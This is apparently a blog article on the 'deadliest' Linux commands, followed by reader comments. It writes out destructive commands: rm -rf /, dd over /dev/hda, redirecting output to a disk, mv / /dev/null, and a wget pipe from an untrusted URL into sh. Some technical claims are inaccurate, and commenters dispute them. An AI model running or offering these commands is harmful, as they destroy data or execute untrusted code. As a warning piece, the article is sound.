Linux can be a double-edged sword. It assumes that you know what you’re doing and gives you the freedom to do whatever you want. It won’t question you. This is convenient when you actually know what you’re doing, but it also means that you could conceivably render your system unusable within seconds.

But whether you’re a Linux newbie or veteran, you should never run a command unless you know exactly what it does. Here are some of the deadliest Linux commands that you’ll, for the most part, want to avoid.

Delete Recursively

The Linux ability to delete anything you want without question is a godsend, especially after dealing with years of “That file can’t be deleted” errors in Windows. But Internet trolls will be quick to deceive you, presenting you with extremely dangerous removal commands that can wipe entire hard drives.

rm -rf /

This line executes the remove command rm with two toggles: -r which forces recursive deletion through all subdirectories and -f which forces deletion of read-only files without confirmation. The command is executed on the / root directory, essentially wiping your whole system clean.

Note, these days on most Linux systems if you tried doing this you’d get a warning. But the warning isn’t guaranteed, so just don’t do it.

Formatting is useful for disk partitions and external drives, but executing it on an entire hard drive (such as /dev/hda) is dangerous and can leave your system in an unrecoverable state.

Overwrite Hard Drive

As if accidental disk formatting wasn’t bad enough, it’s possible to overwrite your hard drive using raw data. At least disk formatting is an actual procedure with real-life uses; directly overwriting one’s drive, on the other hand, is not so great.

command > /dev/hda

In the command above, command can be replaced by any Bash command. The > operator redirects the output from the command on its left to the file on its right. In this case, it doesn’t matter what the output of the left command is. That raw data is being redirected and used to overwrite the system hard drive.

As you can imagine, this renders it useless.

Wipe Hard Drive

Here’s another way to ruin your system. This time around, the command will completely zero out your hard drive. No data corruptions or overwrites; it will literally fill your hard drive with zeroes. A hard drive doesn’t get any more wiped than that.

dd if=/dev/zero of=/dev/hda

The dd command is a low-level instruction that’s mostly used to write data to physical drives. The if parameter determines the source of data, which in this case is /dev/zero, a special on Linux that produces an infinite stream of zeroes. The of parameter determines the destination of those zeroes, which is the /dev/hda drive.

Yes, there are legitimate reasons for zeroing a drive, but if you don’t know what those reasons are, then you’ll want to stay away from this command.

Implode Hard Drive

If you’re tired of hearing ways to wreck your hard drive, hang on. Here’s one more for you. On Linux, there’s a special file called /dev/null that will discard whatever data is written to it. You can think of it as a black hole or a file shredder: anything given to it as input will be eaten up for good.

mv / /dev/null

Can you spot the danger here? The mv command tries to move the system’s root directory / into the black hole of /dev/null. This is a valid command and the result is devastating: the hard drive gets eaten up and there’s nothing left. Doing this will make your system unusable.

The intricacies of the above commands aren’t important here. What is important is that running any of those lines will result in a kernel panic, forcing you to reboot your system. It’s best to stay away from these commands unless you’re absolutely sure you know what you’re doing.

This obscure command is called a fork bomb, which is a special type of kernel panic. It defines a function named : that recursively calls itself twice when executed. One of the recursive calls happens in the foreground while the other happens in the background.

In other words, whenever this function executes, it spawns two child processes. Those child processes spawn their own child processes, and this cycle keeps going in an infinite loop. The only way out of it is to reboot the system.

Execute Remote Script

Here’s an innocent command that can actually be useful in day-to-day life on a Linux system. wget retrieves the contents of a web URL, which can be used to access websites or download files. However, there’s a simple trick that turns it dangerous:

wget http://an-untrusted-url -O- | sh

The above combination downloads the contents of the given URL and immediately feeds it to the sh command, which executes the downloaded contents in the terminal. If the URL were to point to a malicious script, you’d be sealing your own fate with this command.

Disable Root Command Rights

This final command is straightforward. It utilizes the commonly used rm command to disable two of the most important commands on Linux: sudo and su. Long story short, these two allow you to run other commands with root permissions. Without them, life on Linux would be miserable.

2 - I once taught a Linux sysadmin class on a shared system. Since everyone was root on the shared system, we all had to be careful not to step on each other. Sure enough, halfway through the class, the system started to behave odd - someone had run mkswap on /. The unusual part is it took a while (30 mins or so) for the system to start acting odd (df reveals negative 3GB size, nothing in /etc, ...) - I'm guessing the cache was large enough to keep it running for a while. Had to launch my trusty Ubuntu LiveCD on my laptop, and do show and tell for the rest of the day - and get the system re-imaged by next morning.

However many modern shells, especially in Linux, accept 'r' as an equivalent to 'R'
That said, it's better to learn it correctly as not all commands accept the 'r' alternative, or if they do it has a different meaning.
For example, chown and chmod only accept 'R' for recursive actions.

Don't forget slip-ups of package manager commands! In order to upgrade LibreOffice on RPM-based systems, you have to basically remove the LO packages of the old version, and install the packages of the new version. To determine the packages:

rpm -qa | grep libreoff

To remove the packages:

rpm -a | grep libreoff | xargs rpm -e --nodeps

If you forget that "grep libreoff" command, the RPM will start removing all of the packages in the system...

I'm surprised that he didn't mention it either. Of course, it is the same principle as Weyrleader mentions above. It will only run until enough is destroyed that it cannot run--which sounds strange, but is essentially simple. At the point when this command runs across it's own config files or other needed files it will crash from destroying the files which tell it what to do--or part of them, rather.

That's why you don't give regular users root priviledges. root is the administrator, and users should not be running as root (as with sudo -s) normally. If as a non-root user you delete your own files, well, they are your files. If you smash your own china cabinet, what can be said? Make sure you backed them up. I'm pretty sure as a Windows admin you can delete the server too.

Okay, I admit, I'm not a Unix guy. But, it seems to me that you could use Unix to efficiently wipe a hard drive that you're discarding, even if that hard drive was used with a Windows computer. Help me out here, but couldn't you mount the target drive and run the dd if= /dev/zero but in the of= part of the command identify your target drive instead of /dev/hda? Seems like that would work just as well as purchasing some third-party app for wiping the drive.

If you want a secure wipe, putting down zeros is insufficient. If you want to do that, I'd highly recommend just grabbing a copy of sysrescuecd and boot up the live version of that. See near the bottom of

If you can install additional package, I'd strongly recommend using shred command - it overwrites with junk. Or, if you can't
dd if=/dev/urandom
urandom is slow, though it gives quite random numbers. Of course, there is also /dev/random, but it is even slower.
This way you can overwrite with random data.

If you want to try anything questionable like the commands in this article, all you have to do is build a simple Linux virtual machine and save a copy of it that works. Then, you can run almost anything (except for very sophisticated hacks that may be able to break out of a vm) and all you'll risk is the vm itself - which can be restored from a backup ... You do backup your main system, don't you?

for basic or starter Unix user's these commands are to advanced to use.
If they are following a forum and "incorrectly" type some of these commands they will have a problem.
I'm a bit of a novice in unix and never once came across these commands till now.

(a) this article is specifically about linux
(b) on OS X it gives similar behavior
(c) please cite one linux distribution where the behavior suggested by the author actually occurs; for simplicity, try creating a directory and moving that directory to /dev/null, e.g.,

$ mkdir /tmp/foo
$ mv /tmp/foo /dev/null

Even easier, perhaps the author could reveal the distribution on which he tested all these dangerous commands.

I'm an old Unix developer from Bell Labs days. I once needed to reinstall Unix on a computer and thought I'd try the "rm -fr /" command before wiping the disk for reinstallation. It does ruin the system, but it doesn't remove everything on the disk. In fact it only gets to a small amount of the files before crashing the system. The number of files deleted depends on the order in which their deleted. Which depends on the order in which they were installed when the OS was first laid out. So, although this command's result is essentially as deadly as described in the article. It's not nearly as destructive as you state.

Most of us use the 'alias' function to replace dangerous commands with slightly safer alternatives. For example:

alias rm='/bin/rm -i'

This replaces the 'remove' command, 'rm', with the same command, but adds in the switch '-i', for 'inquire', which will ALWAYS ask you if that's what you really want. If you want to use the big hammer, you just type the full path to the command, '/bin/rm', which will override the alias.

Here are the two commands you need to know: 'man' and 'apropos'

'man' stands for 'manual', and apropos is short for 'man -k'. Basically 'apropos' searches the description lines of all the manual entries for keywords.

that alias did cause a wipe of a system
a UE that was used to always get the "are you sure" question wanted to clean out some old kernels and did
cd /boot
rm *
and after that it was nothing left since on this system that alias wasn't in place.

another thing - don't be root to start with. If you need to do something as root then "sudo something", then if you do something stupid like
cd /